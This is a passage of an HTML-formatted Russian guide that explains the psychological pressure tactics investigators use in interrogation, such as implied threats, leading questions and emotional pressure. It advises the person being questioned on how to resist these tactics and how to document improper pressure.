    &lt;li id=&quot;17JH&quot;&gt;При необходимости обращаться за консультацией к адвокату, прежде чем делиться какими-либо деталями или реагировать на кажущиеся «смягчающие» предложения.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;fe4l&quot; data-align=&quot;center&quot;&gt;4. Методы запугивания и использования неявных угроз&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;cVTO&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/55/7e/557ea877-ee76-4e10-8928-f8eb7cb7f1af.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QWeG&quot;&gt;Следующий распространенный способ психологического давления в ходе допроса — использование запугивания и неявных угроз. Этот метод направлен на то, чтобы вызвать у допрашиваемого чувство страха и заставить его почувствовать, что сотрудничество с следствием — единственный способ избежать негативных последствий. При этом угрозы могут быть завуалированными и косвенными, что усложняет их распознавание.&lt;/p&gt;
  &lt;h4 id=&quot;ExKW&quot;&gt;Как работают методы запугивания&lt;/h4&gt;
  &lt;p id=&quot;lvfG&quot;&gt;Следователи могут применять различные формы запугивания, например:&lt;/p&gt;
  &lt;ul id=&quot;jWco&quot;&gt;
    &lt;li id=&quot;3mee&quot;&gt;&lt;strong&gt;Подсознательные намеки на серьезные последствия отказа от сотрудничества&lt;/strong&gt;. Например, следователь может упомянуть, что «помощь в следствии» снижает вероятность более тяжелых последствий. Такие фразы используются, чтобы побудить человека к самооговору, не предъявляя ему прямой угрозы.&lt;/li&gt;
    &lt;li id=&quot;ZRx5&quot;&gt;&lt;strong&gt;Создание атмосферы незащищенности&lt;/strong&gt;. Следователь может намекнуть на долгие разбирательства, возможные проверки, что вызовет у допрашиваемого тревогу за собственное будущее и благополучие близких. В предоставленных материалах указано, что «психическое воздействие на личность проявляется в ее поведении, состоянии и реакциях», и неявные угрозы как раз нацелены на то, чтобы вызвать эмоциональную реакцию страха и беспокойства.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;wZiS&quot;&gt;Опасности неявных угроз&lt;/h4&gt;
  &lt;p id=&quot;DlcS&quot;&gt;Неявные угрозы опасны тем, что они оставляют допрашиваемого в подвешенном состоянии, вызывая у него страх и желание избежать худшего сценария. В такой ситуации допрашиваемый может поддаться давлению и раскрыть больше информации, чем планировал, надеясь, что это облегчит его положение. Однако, как отмечается в литературе, «воздействие на человека может носить как правомерный, так и неправомерный характер», и неявные угрозы часто оказываются за гранью допустимого.&lt;/p&gt;
  &lt;h4 id=&quot;gPaW&quot;&gt;Как противостоять запугиванию и неявным угрозам&lt;/h4&gt;
  &lt;p id=&quot;VG2c&quot;&gt;Для защиты от подобных приемов необходимо сохранять критическое отношение ко всем высказываниям следователя и помнить о своих правах:&lt;/p&gt;
  &lt;ul id=&quot;IHC8&quot;&gt;
    &lt;li id=&quot;5rCL&quot;&gt;&lt;strong&gt;Формально отвечать на вопросы и избегать эмоциональных реакций&lt;/strong&gt;. Следует держать общение в нейтральном русле, не показывая страха или тревоги.&lt;/li&gt;
    &lt;li id=&quot;DWNz&quot;&gt;&lt;strong&gt;Привлекать адвоката к процессу&lt;/strong&gt;. При наличии защитника следователи гораздо реже прибегают к неявным угрозам, так как адвокат может зафиксировать такие действия и подать жалобу.&lt;/li&gt;
    &lt;li id=&quot;TadQ&quot;&gt;&lt;strong&gt;Запрашивать фиксацию вопросов и ответов&lt;/strong&gt;. Если возникает подозрение на запугивание, допрашиваемый вправе настаивать на фиксации всех вопросов в протоколе, что может сдержать следователя от использования подобных методов.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;32VZ&quot; data-align=&quot;center&quot;&gt;5. Наведение и внушение: вербальные и невербальные приемы&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;MrHT&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4c/b8/4cb88a58-f47e-4558-96ad-03e48c53d398.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XxGZ&quot;&gt;Этот метод часто применяется для того, чтобы направить мысли и ответы допрашиваемого в нужное следователю русло, не прибегая к прямому принуждению. Наведение и внушение, как психологические приемы, могут значительно повлиять на восприятие и поведение человека, особенно в условиях стресса.&lt;/p&gt;
  &lt;h4 id=&quot;srdV&quot;&gt;Примеры вербальных приемов внушения&lt;/h4&gt;
  &lt;p id=&quot;CCfu&quot;&gt;Следователь может задавать вопросы таким образом, чтобы допрашиваемый подсознательно чувствовал себя склонным к ответу, который выгоден следствию. В литературе отмечается, что «постановка вопросов наводящего характера признается в качестве неправомерного психического воздействия», поскольку она лишает человека свободы выбора. Вербальное наведение может включать:&lt;/p&gt;
  &lt;ul id=&quot;lLuV&quot;&gt;
    &lt;li id=&quot;0ORq&quot;&gt;&lt;strong&gt;Наводящие вопросы&lt;/strong&gt;. Вопросы формулируются так, чтобы предполагать определенный ответ, например: «Вы согласны, что это могло случиться из-за ваших действий?»&lt;/li&gt;
    &lt;li id=&quot;O6l0&quot;&gt;&lt;strong&gt;Скрытые предположения&lt;/strong&gt;. Следователь может утверждать, что некие «доказательства» уже указывают на определенные факты, тем самым создавая у допрашиваемого ощущение, что отрицание не имеет смысла.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;HXy8&quot;&gt;Невербальные приемы внушения&lt;/h4&gt;
  &lt;p id=&quot;SDdQ&quot;&gt;Кроме слов, следователь может использовать невербальные сигналы, чтобы усилить влияние на допрашиваемого. К таким приемам относятся:&lt;/p&gt;
  &lt;ul id=&quot;DZzi&quot;&gt;
    &lt;li id=&quot;K6ss&quot;&gt;&lt;strong&gt;Паузы и молчание&lt;/strong&gt;. Долгая пауза после ответа может вызвать у допрашиваемого желание дополнить или изменить сказанное, что следователь может использовать для получения дополнительных сведений.&lt;/li&gt;
    &lt;li id=&quot;vLJN&quot;&gt;&lt;strong&gt;Жесты и выражение лица&lt;/strong&gt;. Кивки, приподнятые брови, устремленный взгляд — все это может усиливать внушение и создавать давление на подсознание допрашиваемого.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;lYwJ&quot;&gt;Риски наведения и внушения&lt;/h4&gt;
  &lt;p id=&quot;3Clm&quot;&gt;Когда допрашиваемый сталкивается с такими приемами, он может начать сомневаться в собственных воспоминаниях или выводах. В литературе подчеркивается, что внушение «влияет на внутренние психические процессы и вызывает изменения поведения». В результате человек может дать показания, которые не соответствуют действительности, просто потому, что на него воздействовали методами скрытого внушения.&lt;/p&gt;
  &lt;h4 id=&quot;WK2H&quot;&gt;Как противостоять внушению и наведению&lt;/h4&gt;
  &lt;p id=&quot;3G6J&quot;&gt;Для защиты от таких приемов важно сохранять внутреннюю концентрацию и помнить, что каждый ответ должен соответствовать вашим убеждениям, а не ожиданиям следователя. Вот несколько рекомендаций:&lt;/p&gt;
  &lt;ul id=&quot;qDQ9&quot;&gt;
    &lt;li id=&quot;eimT&quot;&gt;&lt;strong&gt;Уточняйте вопросы&lt;/strong&gt;. Если вопрос показался вам наводящим, уточните его или попросите переформулировать.&lt;/li&gt;
    &lt;li id=&quot;Bqmq&quot;&gt;&lt;strong&gt;Избегайте дополнительных пояснений&lt;/strong&gt;. Отвечайте лаконично и не пытайтесь угодить следователю, раскрывая больше, чем требуется.&lt;/li&gt;
    &lt;li id=&quot;bbhE&quot;&gt;&lt;strong&gt;Фокусируйтесь на собственных фактах&lt;/strong&gt;. Держите в уме свои аргументы и факты, чтобы не поддаваться подсознательному влиянию наводящих вопросов.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;xaOP&quot; data-align=&quot;center&quot;&gt;6. Методы использования информации против допрашиваемого&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;x3Hg&quot;&gt;Этот метод включает в себя как прямое, так и косвенное применение фактов, чтобы повлиять на показания и поведение человека в ходе допроса. Важно понимать, как следователи могут манипулировать информацией и как защититься от подобных приемов.&lt;/p&gt;
  &lt;h4 id=&quot;w3qR&quot;&gt;Прямое использование информации&lt;/h4&gt;
  &lt;p id=&quot;CHw9&quot;&gt;Следователь может демонстрировать допрашиваемому «доказательства», чтобы убедить его в том, что его положение безнадежно. Например, если следователь утверждает, что у него есть неопровержимые улики, это может вызвать у допрашиваемого страх и стремление признаться, чтобы смягчить наказание. Как отмечается в литературе, «доказательства, которые следователь может продемонстрировать, создают у допрашиваемого иллюзию, что скрывать правду бесполезно».&lt;/p&gt;
  &lt;h4 id=&quot;7zqb&quot;&gt;Косвенное использование информации&lt;/h4&gt;
  &lt;p id=&quot;K2bu&quot;&gt;Следователь может использовать информацию более хитро, задавая вопросы, которые завуалированно намекают на известные факты. Например, он может спросить: «Как вы думаете, что другие могут сказать о вашем участии в этом деле?» Такой подход создает у допрашиваемого ощущение, что его слова могут быть использованы против него, и это может подталкивать его к неуместным ответам или признаниям.&lt;/p&gt;
  &lt;h4 id=&quot;30ue&quot;&gt;Эмоциональное давление через информацию&lt;/h4&gt;
  &lt;p id=&quot;pKdI&quot;&gt;Допрашиваемый также может испытывать давление через манипуляции с эмоциональной составляющей информации. Например, следователь может намекнуть на то, что последующее поведение может повлиять на близких или друзей допрашиваемого, вызывая чувство вины. Это может привести к дополнительному стрессу и снижению уверенности в себе.&lt;/p&gt;
  &lt;h4 id=&quot;uTTD&quot;&gt;Риски, связанные с использованием информации&lt;/h4&gt;
  &lt;p id=&quot;8BOx&quot;&gt;Использование информации в допросе может привести к необъективным показаниям. Если допрашиваемый чувствует себя под давлением из-за демонстрации улик, он может принять решение дать ложные или искаженные показания в надежде на смягчение последствий. Как подчеркивается в материалах, «психическое воздействие может привести к изменению состояния и поведению допрашиваемого».&lt;/p&gt;
  &lt;h4 id=&quot;m80z&quot;&gt;Как противостоять манипуляциям с информацией&lt;/h4&gt;
  &lt;p id=&quot;Pn0W&quot;&gt;Для защиты от манипуляций с информацией рекомендуется:&lt;/p&gt;
  &lt;ul id=&quot;bJzg&quot;&gt;
    &lt;li id=&quot;MPR8&quot;&gt;&lt;strong&gt;Запрашивать конкретные доказательства&lt;/strong&gt;. Если следователь утверждает, что у него есть улики, допрашиваемый вправе уточнить, какие именно доказательства имеются в наличии.&lt;/li&gt;
    &lt;li id=&quot;hXmn&quot;&gt;&lt;strong&gt;Не поддаваться эмоциям&lt;/strong&gt;. Важно сохранять спокойствие и рассудительность, независимо от информации, которая может быть представлена.&lt;/li&gt;
    &lt;li id=&quot;BGD6&quot;&gt;&lt;strong&gt;Иметь возможность консультации с адвокатом&lt;/strong&gt;. Привлечение защитника на допросе позволяет защитить свои права и снизить влияние психологических приемов следователя.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;8aji&quot; data-align=&quot;center&quot;&gt;7. Эмоциональное давление через воспоминания и личные переживания&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;KjT8&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/06/aa/06aa3bce-0e8b-4cc8-8591-b5bd5223385f.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;pBJh&quot;&gt;Этот метод направлен на то, чтобы вызвать сильные чувства у допрашиваемого, используя его личные воспоминания и эмоциональные привязанности. Такие приемы оказывают значительное влияние на психику, так как задействуют глубинные эмоции, которые могут заставить человека раскрываться больше, чем он планировал.&lt;/p&gt;
  &lt;h4 id=&quot;D8r9&quot;&gt;Как следователь вызывает эмоциональное давление&lt;/h4&gt;
  &lt;p id=&quot;neBW&quot;&gt;Следователь может затронуть темы, вызывающие у допрашиваемого сильные эмоциональные переживания — например, темы, связанные с семьей, друзьями или личными трудностями. В литературе подчеркивается, что эмоциональное давление через воспоминания и личные переживания часто используется для ослабления сопротивления допрашиваемого. Примерные приемы включают:&lt;/p&gt;
  &lt;ul id=&quot;t9Yj&quot;&gt;
    &lt;li id=&quot;LYsK&quot;&gt;&lt;strong&gt;Вопросы о близких и членах семьи&lt;/strong&gt;. Следователь может упомянуть, что возможные последствия могут коснуться не только допрашиваемого, но и его близких, что вызывает чувство вины и беспокойства.&lt;/li&gt;
    &lt;li id=&quot;j8JC&quot;&gt;&lt;strong&gt;Воспоминания о личных неудачах&lt;/strong&gt;. Ссылки на сложные моменты из прошлого могут вызвать у человека ощущение, что он не сможет справиться с ситуацией, подталкивая его к сотрудничеству.&lt;/li&gt;
    &lt;li id=&quot;Q5GY&quot;&gt;&lt;strong&gt;Эмпатия и понимание&lt;/strong&gt;. Следователь может казаться понимающим и поддерживающим, что снижает защитные механизмы и заставляет допрашиваемого чувствовать себя более склонным к откровенности.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;xecZ&quot;&gt;Риски эмоционального давления&lt;/h4&gt;
  &lt;p id=&quot;CdTk&quot;&gt;Эмоциональное давление опасно тем, что оно может сильно повлиять на объективность допрашиваемого. В условиях стресса и волнения человек может сделать эмоциональные признания, которые не соответствуют действительности, или раскрыть лишнюю информацию, надеясь облегчить эмоциональную нагрузку. Как подчеркивается в источниках, «психическое воздействие может изменить восприятие допрашиваемого и вызвать определенные реакции, которые проявляются в его поведении и показаниях».&lt;/p&gt;
  &lt;h4 id=&quot;BBc4&quot;&gt;Противодействие эмоциональному давлению&lt;/h4&gt;
  &lt;p id=&quot;F6BJ&quot;&gt;Чтобы защититься от такого воздействия, допрашиваемому важно сохранять контроль над своими эмоциями и помнить, что манипуляции с личными темами — это лишь тактический прием следователя. Рекомендации по противодействию включают:&lt;/p&gt;
  &lt;ul id=&quot;iSQ9&quot;&gt;
    &lt;li id=&quot;tfQl&quot;&gt;&lt;strong&gt;Держать эмоции под контролем&lt;/strong&gt;. Если следователь затрагивает личные темы, старайтесь оставаться сдержанным и не поддаваться на провокации.&lt;/li&gt;
    &lt;li id=&quot;sA4b&quot;&gt;&lt;strong&gt;Понимать мотивы следователя&lt;/strong&gt;. Осознавайте, что вопросы, касающиеся личных деталей, направлены на то, чтобы вызвать эмоциональную реакцию. Это поможет сохранить рациональность.&lt;/li&gt;
    &lt;li id=&quot;KKib&quot;&gt;&lt;strong&gt;Избегать обсуждения личных тем&lt;/strong&gt;. Допрашиваемый вправе отвечать только на вопросы, относящиеся к делу, и может избегать углубления в личные подробности.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;IASX&quot; data-align=&quot;center&quot;&gt;8. Сложные многослойные вопросы и использование логических ловушек&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;5TLb&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2a/57/2a5711c3-d8b1-4bc2-9099-ff3d5bdbf437.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FGVq&quot;&gt;Этот метод основан на том, чтобы задавать вопросы, состоящие из нескольких частей, которые трудно сразу проанализировать, или такие, которые содержат скрытые противоречия. Цель таких вопросов — заставить человека оговориться, запутаться или выдать противоречивую информацию.&lt;/p&gt;
  &lt;h4 id=&quot;g2nr&quot;&gt;Как работают многослойные вопросы&lt;/h4&gt;
  &lt;p id=&quot;k2PG&quot;&gt;Многослойный вопрос включает несколько подтем и формулируется так, чтобы вызвать у допрашиваемого затруднения с точным ответом. Вопросы такого типа могут иметь двойное значение или предполагать несколько вариантов ответа одновременно. Пример: «Почему вы не сообщили о случившемся сразу, если вы действительно ничего не скрывали?» Этот вопрос включает предположение о виновности, что может спровоцировать человека на защитную реакцию.&lt;/p&gt;
  &lt;h4 id=&quot;xbaY&quot;&gt;Логические ловушки в вопросах&lt;/h4&gt;
  &lt;p id=&quot;thA1&quot;&gt;Логические ловушки используются, чтобы вынудить допрашиваемого признать или подтвердить нечто, что может быть использовано против него. Например, вопрос типа «Вы ведь понимаете, что если бы вы не скрывали информацию, все бы разрешилось быстрее?» намекает на то, что скрытие информации уже произошло, что может подтолкнуть человека к самооговору, даже если это не так.&lt;/p&gt;
  &lt;h4 id=&quot;090y&quot;&gt;Риски ответов на такие вопросы&lt;/h4&gt;
  &lt;p id=&quot;GAlC&quot;&gt;Такие вопросы ставят допрашиваемого в сложное положение, так как они могут вызвать неосознанное подтверждение предположений следователя. «Сила информационного воздействия заключается в том, что изменения состояния объекта могут происходить даже без явного давления». В ходе допроса человек может начать сомневаться в собственной правоте или запутаться, что ведет к противоречивым ответам.&lt;/p&gt;
  &lt;h4 id=&quot;DWOx&quot;&gt;Как противостоять многослойным вопросам и логическим ловушкам&lt;/h4&gt;
  &lt;p id=&quot;UJri&quot;&gt;Для защиты от таких методов допрашиваемому важно сохранять спокойствие и реагировать на вопросы постепенно:&lt;/p&gt;
  &lt;ul id=&quot;MMmm&quot;&gt;
    &lt;li id=&quot;635X&quot;&gt;&lt;strong&gt;Просить уточнения&lt;/strong&gt;. Если вопрос сложный, не бойтесь попросить следователя переформулировать или уточнить его.&lt;/li&gt;
    &lt;li id=&quot;uImI&quot;&gt;&lt;strong&gt;Отвечать кратко и по существу&lt;/strong&gt;. Длинные объяснения могут привести к непреднамеренным противоречиям, поэтому отвечайте только на ту часть вопроса, которая четко понятна.&lt;/li&gt;
    &lt;li id=&quot;5ZTG&quot;&gt;&lt;strong&gt;Не поддаваться на уловки&lt;/strong&gt;. Помните, что вопрос может быть построен с целью вас сбить, и отвечайте только исходя из своих убеждений и фактов, которые вам известны.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;EtGG&quot; data-align=&quot;center&quot;&gt;9. Распознавание и фиксация неправомерного давления&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;Xok4&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3e/d1/3ed18724-2eef-4e18-bbb2-9172d0f535c7.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;3MMp&quot;&gt;Неправомерные методы включают как прямое физическое и психологическое давление, так и более завуалированные приемы, такие как манипуляция временем, использование эмоционального воздействия и неявные угрозы. Если эти методы остаются без должной фиксации, доказательства, полученные в ходе допроса, могут быть использованы против допрашиваемого, несмотря на их незаконное получение.&lt;/p&gt;
  &lt;h4 id=&quot;kH8G&quot;&gt;Признаки неправомерного давления&lt;/h4&gt;
  &lt;p id=&quot;uAqQ&quot;&gt;Определить неправомерное давление можно по следующим признакам:&lt;/p&gt;
  &lt;ul id=&quot;i92Z&quot;&gt;
    &lt;li id=&quot;Jvq5&quot;&gt;&lt;strong&gt;Физическое давление&lt;/strong&gt;: прямое или косвенное применение силы, угрозы физического воздействия.&lt;/li&gt;
    &lt;li id=&quot;yJdU&quot;&gt;&lt;strong&gt;Психологическое давление&lt;/strong&gt;: постоянные намеки на негативные последствия отказа от сотрудничества, использование угроз в отношении семьи или близких.&lt;/li&gt;
    &lt;li id=&quot;2QqZ&quot;&gt;&lt;strong&gt;Игнорирование прав&lt;/strong&gt;: отказ в доступе к адвокату, препятствия в подаче жалоб, отказ фиксировать заявления о нарушениях в протоколе.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;AlhB&quot;&gt;Как подчеркивается в предоставленных материалах, «неправомерное психическое воздействие может быть оказано явно и латентно», что требует от допрашиваемого умения распознавать даже скрытые формы давления.&lt;/p&gt;
  &lt;h4 id=&quot;mVZH&quot;&gt;Как фиксировать неправомерное давление&lt;/h4&gt;
  &lt;p id=&quot;yXs1&quot;&gt;Фиксация нарушений — важный элемент защиты, так как только документальные доказательства могут быть приняты судом в качестве обоснования для признания допроса недействительным. Вот основные способы фиксации:&lt;/p&gt;
  &lt;ul id=&quot;fFQg&quot;&gt;
    &lt;li id=&quot;wedf&quot;&gt;&lt;strong&gt;Подача письменных заявлений и жалоб&lt;/strong&gt;. Если на допросе оказывают давление, допрашиваемый может прямо заявить об этом и потребовать внесения своей жалобы в протокол.&lt;/li&gt;
    &lt;li id=&quot;E22d&quot;&gt;&lt;strong&gt;Присутствие адвоката&lt;/strong&gt;. Адвокат, как независимый участник, имеет право документировать нарушения и подавать жалобы от имени допрашиваемого.&lt;/li&gt;
    &lt;li id=&quot;thpT&quot;&gt;&lt;strong&gt;Письменные замечания к протоколу&lt;/strong&gt;. В конце допроса у допрашиваемого есть право указать все замечания по процедуре в протоколе, включая факты неправомерного давления.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;eD8Z&quot;&gt;Практические советы для защиты&lt;/h4&gt;
  &lt;p id=&quot;zhAx&quot;&gt;Для минимизации рисков рекомендуется:&lt;/p&gt;
  &lt;ul id=&quot;mcvj&quot;&gt;
    &lt;li id=&quot;3J6v&quot;&gt;&lt;strong&gt;Требовать внесения всех вопросов и ответов в протокол&lt;/strong&gt;. Это снижает вероятность использования манипуляций и давления.&lt;/li&gt;
    &lt;li id=&quot;IfO6&quot;&gt;&lt;strong&gt;Фиксировать любые попытки отказа в праве на защиту&lt;/strong&gt;. Отказ в доступе к адвокату или предоставлении времени на консультацию — серьезное нарушение.&lt;/li&gt;
    &lt;li id=&quot;qaX2&quot;&gt;&lt;strong&gt;Не поддаваться на провокации и сохранять спокойствие&lt;/strong&gt;. Эмоциональная реакция может усложнить процесс фиксации и снизить объективность восприятия происходящего.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;PqSe&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;10. Особые случаи: видеозапись и другие способы фиксации допроса&lt;/strong&gt;&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;MGNf&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ec/5d/ec5d70bb-f84e-464f-b651-a4495d56f445.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;WL5i&quot;&gt;Использование видеозаписи и других методов фиксации допроса — это важный механизм защиты прав допрашиваемого, особенно в случаях, когда могут возникнуть сомнения в правомерности методов следствия. Видео- и аудиофиксация позволяют создать объективную картину происходящего, зафиксировать все вопросы, ответы и поведение участников допроса, а также предотвратить применение незаконных методов воздействия.&lt;/p&gt;
  &lt;h4 id=&quot;ukrB&quot;&gt;Значение видеозаписи в ходе допроса&lt;/h4&gt;
  &lt;p id=&quot;hwq8&quot;&gt;Видеозапись допроса выполняет сразу несколько функций:&lt;/p&gt;
  &lt;ul id=&quot;qlew&quot;&gt;
    &lt;li id=&quot;WDtj&quot;&gt;&lt;strong&gt;Обеспечение объективности&lt;/strong&gt;. Запись позволяет зафиксировать все, что происходило на допросе, включая тон и формулировку вопросов, а также поведение следователя и допрашиваемого.&lt;/li&gt;
    &lt;li id=&quot;ZZXg&quot;&gt;&lt;strong&gt;Превентивный эффект&lt;/strong&gt;. Осознавая, что допрос фиксируется, следователь будет меньше склонен к использованию методов давления или манипуляций, так как такие действия могут быть впоследствии раскрыты.&lt;/li&gt;
    &lt;li id=&quot;40cU&quot;&gt;&lt;strong&gt;Доказательная база&lt;/strong&gt;. При возникновении споров о правомерности действий следователя видеозапись может использоваться в суде для подтверждения слов допрашиваемого о нарушениях.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;fQRV&quot;&gt;Когда видеозапись обязательна&lt;/h4&gt;
  &lt;p id=&quot;XmSv&quot;&gt;В некоторых случаях законодательство предусматривает обязательное применение видеозаписи, особенно когда дело связано с тяжкими преступлениями, подозреваемый находится в уязвимом положении (например, несовершеннолетние или лица с психическими заболеваниями), либо есть основания полагать, что могут применяться незаконные методы. В таких случаях отказ от видеозаписи может быть расценен как нарушение прав допрашиваемого.&lt;/p&gt;
  &lt;h4 id=&quot;JGyg&quot;&gt;Что делать, если видеозапись отсутствует&lt;/h4&gt;
  &lt;p id=&quot;24Ea&quot;&gt;Если видеозапись не ведется, допрашиваемый имеет право:&lt;/p&gt;
  &lt;ul id=&quot;Gje0&quot;&gt;
    &lt;li id=&quot;xrrd&quot;&gt;&lt;strong&gt;Попросить включить запись&lt;/strong&gt;. Если на допросе присутствует видеокамера, можно попросить следователя начать запись.&lt;/li&gt;
    &lt;li id=&quot;tf9G&quot;&gt;&lt;strong&gt;Сделать замечание в протоколе&lt;/strong&gt;. Если в проведении записи отказано без объяснения причин, допрашиваемый может сделать письменное замечание в протоколе допроса о своем требовании и отказе следователя его удовлетворить.&lt;/li&gt;
    &lt;li id=&quot;63bJ&quot;&gt;&lt;strong&gt;Требовать участия адвоката&lt;/strong&gt;. В отсутствие видеозаписи адвокат может зафиксировать все важные моменты и нарушения, предоставив дополнительную защиту прав.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;ftFS&quot;&gt;Альтернативные способы фиксации&lt;/h4&gt;
  &lt;p id=&quot;t50l&quot;&gt;Если видеозапись невозможна или не предусмотрена, рекомендуется использовать следующие альтернативные методы фиксации:&lt;/p&gt;
  &lt;ul id=&quot;1Y1h&quot;&gt;
    &lt;li id=&quot;mPRh&quot;&gt;&lt;strong&gt;Аудиозапись&lt;/strong&gt;. В ряде случаев аудиозапись может выполнять те же функции, что и видео, фиксируя интонацию и формулировку вопросов.&lt;/li&gt;
    &lt;li id=&quot;4Rxq&quot;&gt;&lt;strong&gt;Протоколирование&lt;/strong&gt;. Важно проследить, чтобы в протокол были внесены все вопросы и ответы в точности, без изменений и искажений.&lt;/li&gt;
    &lt;li id=&quot;I0U1&quot;&gt;&lt;strong&gt;Показания свидетелей&lt;/strong&gt;. В сложных ситуациях может быть полезно присутствие независимых лиц (например, специалистов или наблюдателей), которые могут подтвердить условия проведения допроса.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;HiQy&quot; data-align=&quot;center&quot;&gt;11. Система &amp;quot;П.Л.О.Д.&amp;quot;&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;v9O3&quot;&gt;Система &amp;quot;П.Л.О.Д.&amp;quot; — это практическая тактика, разработанная для защиты прав и интересов допрашиваемого в условиях допроса. Название системы расшифровывается как четыре ключевых принципа поведения: Протокол, Личное, Отношение и Допустимость. Эти элементы помогают избегать ловушек, которые следователь может использовать, и дают возможность контролировать ситуацию, уменьшая риск самооговора или предоставления компрометирующих данных. Рассмотрим каждый принцип системы подробнее.&lt;/p&gt;
  &lt;h4 id=&quot;GQWD&quot;&gt;Принципы системы &amp;quot;П.Л.О.Д.&amp;quot;&lt;/h4&gt;
  &lt;ol id=&quot;ZSD1&quot;&gt;
    &lt;li id=&quot;qx3D&quot;&gt;&lt;strong&gt;П — Протокол&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;hYTu&quot;&gt;
      &lt;li id=&quot;zrAL&quot;&gt;&lt;strong&gt;Суть принципа&lt;/strong&gt;: Все вопросы и ответы следователя должны быть зафиксированы в протоколе. Если следователь отказывается записывать вопрос, у вас есть полное право не отвечать на него.&lt;/li&gt;
      &lt;li id=&quot;I7ob&quot;&gt;&lt;strong&gt;Почему это важно&lt;/strong&gt;: Принцип «Протокол» защищает вас от манипуляций, так как следователь не сможет использовать вопросы или ответы в невыгодном для вас формате. Например, если следователь задает вопрос, на который ваш ответ может показать вас с невыгодной стороны, он может просто не включить его в протокол. Требование записывать каждый вопрос и ответ в протокол предотвращает такие ситуации.&lt;/li&gt;
      &lt;li id=&quot;L4gk&quot;&gt;&lt;strong&gt;Пример&lt;/strong&gt;: Если следователь спрашивает: «Умеете ли вы делать коктейли Молотова?», а вы отвечаете, что «не доводилось», следователь может попытаться интерпретировать ваш ответ или добавить детали. Ваша обязанность — требовать, чтобы ваш ответ был записан дословно и точно.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;sUZO&quot;&gt;&lt;strong&gt;Л — Личное&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;kNlU&quot;&gt;
      &lt;li id=&quot;u1vF&quot;&gt;&lt;strong&gt;Суть принципа&lt;/strong&gt;: Если вопрос касается лично вас или может сделать вас подозреваемым, вы имеете право не отвечать. Важно понимать, что каждый ответ на такие вопросы может поставить вас в невыгодное положение.&lt;/li&gt;
      &lt;li id=&quot;DCbr&quot;&gt;&lt;strong&gt;Почему это важно&lt;/strong&gt;: Следователь может использовать ответы на личные вопросы, чтобы выставить вас в качестве подозреваемого или соучастника. Отказ от ответа на вопросы, которые касаются личных деталей, позволяет сохранить дистанцию и защититься от провокаций.&lt;/li&gt;
      &lt;li id=&quot;aTof&quot;&gt;&lt;strong&gt;Пример&lt;/strong&gt;: Следователь спрашивает о вашей личной деятельности, которая не относится к делу. Вы можете ответить, что не видите отношения вопроса к делу, и отказываетесь отвечать.&lt;/li&gt;
